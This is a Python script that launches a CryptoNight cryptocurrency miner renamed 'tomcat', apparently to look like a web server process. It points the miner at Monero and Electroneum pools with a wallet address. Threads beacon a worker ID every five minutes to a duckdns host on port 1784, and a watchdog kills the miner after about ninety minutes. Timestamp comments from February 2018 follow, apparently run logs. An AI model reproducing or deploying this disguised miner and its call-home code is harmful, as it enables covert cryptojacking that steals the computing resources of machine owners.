import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:12:06.401522
#2018-02-17 16:58:04.684735
#2018-02-17 18:47:05.154189
#2018-02-17 20:35:08.074464
#2018-02-17 22:21:06.548587
#2018-02-18 00:05:03.927681
#2018-02-18 01:55:07.948740
#2018-02-18 03:43:07.077413
#2018-02-18 05:31:01.446808
#2018-02-18 07:23:03.604308
#2018-02-18 09:11:04.349333
#2018-02-18 10:57:05.475623
#2018-02-18 12:43:07.129658
#2018-02-18 14:30:01.734788
#2018-02-18 16:20:08.068456
#2018-02-18 18:09:01.288242
#2018-02-18 19:54:06.255980
#2018-02-18 21:41:03.551518
#2018-02-18 23:29:04.416932
#2018-02-19 01:16:07.292855
#2018-02-19 03:03:03.864908
#2018-02-19 04:49:06.110677
#2018-02-19 06:33:05.245807
#2018-02-19 08:22:02.240073
#2018-02-19 10:12:06.024348
#2018-02-19 12:01:06.850995
#2018-02-19 13:47:12.653081
#2018-02-19 15:36:08.268452
#2018-02-19 17:24:04.450471
#2018-02-19 19:12:07.241871
#2018-02-19 20:59:01.809061
#2018-02-19 22:47:03.480725
#2018-02-20 00:32:08.147132
#2018-02-20 02:21:05.730663
#2018-02-20 04:11:06.197277
#2018-02-20 05:54:01.372810
#2018-02-20 07:39:03.893525
#2018-02-20 09:23:02.026922
#2018-02-20 11:07:06.189648
#2018-02-20 12:54:01.515533
#2018-02-20 14:40:07.186277
#2018-02-20 16:25:03.067439
#2018-02-20 18:11:08.037509
#2018-02-20 20:04:03.091507
#2018-02-20 21:50:03.124411
#2018-02-20 23:32:01.494342
#2018-02-21 01:16:07.042530
#2018-02-21 03:04:07.314018
#2018-02-21 04:50:08.947359
#2018-02-21 06:37:01.890377
#2018-02-21 08:23:06.796228
#2018-02-21 10:08:06.343492
#2018-02-21 11:57:01.397753
#2018-02-21 13:47:01.860906
#2018-02-21 15:31:05.930302
#2018-02-21 17:20:07.199594
#2018-02-21 19:07:07.958083
#2018-02-21 20:54:05.263210
#2018-02-21 22:43:09.991730
#2018-02-22 00:32:06.012798
#2018-02-22 02:21:09.573871
#2018-02-22 04:09:06.312925
#2018-02-22 05:54:03.704379
#2018-02-22 07:40:08.991820
#2018-02-22 09:28:07.918568
#2018-02-22 11:14:07.833691
#2018-02-22 13:01:01.442443
#2018-02-22 14:48:01.831010
#2018-02-22 16:34:04.029797
#2018-02-22 18:21:07.904202
#2018-02-22 20:12:09.214209
#2018-02-22 21:59:05.880753
#2018-02-22 23:47:01.353251
#2018-02-23 01:34:06.195726
#2018-02-23 03:20:07.553261
#2018-02-23 05:07:06.351091
#2018-02-23 06:53:06.356119
#2018-02-23 08:43:06.118445
#2018-02-23 10:58:07.093219
#2018-02-23 12:55:12.182193
#2018-02-23 14:41:09.662505
#2018-02-23 16:30:03.432807
#2018-02-23 18:17:08.750794
#2018-02-23 20:03:01.484413
#2018-02-23 21:46:03.991202
#2018-02-23 23:39:04.534457
#2018-02-24 01:27:06.619834
#2018-02-24 03:18:04.174290
#2018-02-24 05:03:06.139804
#2018-02-24 06:51:06.268285
#2018-02-24 08:43:04.672562
#2018-02-24 10:28:03.370176
#2018-02-24 12:22:01.478627
#2018-02-24 14:16:01.947360
#2018-02-24 16:01:06.297291
#2018-02-24 17:55:05.427850
#2018-02-24 19:42:06.323657
#2018-02-24 21:29:07.457734
#2018-02-25 01:54:04.229310
#2018-02-25 05:02:05.415116
#2018-02-25 09:57:01.487015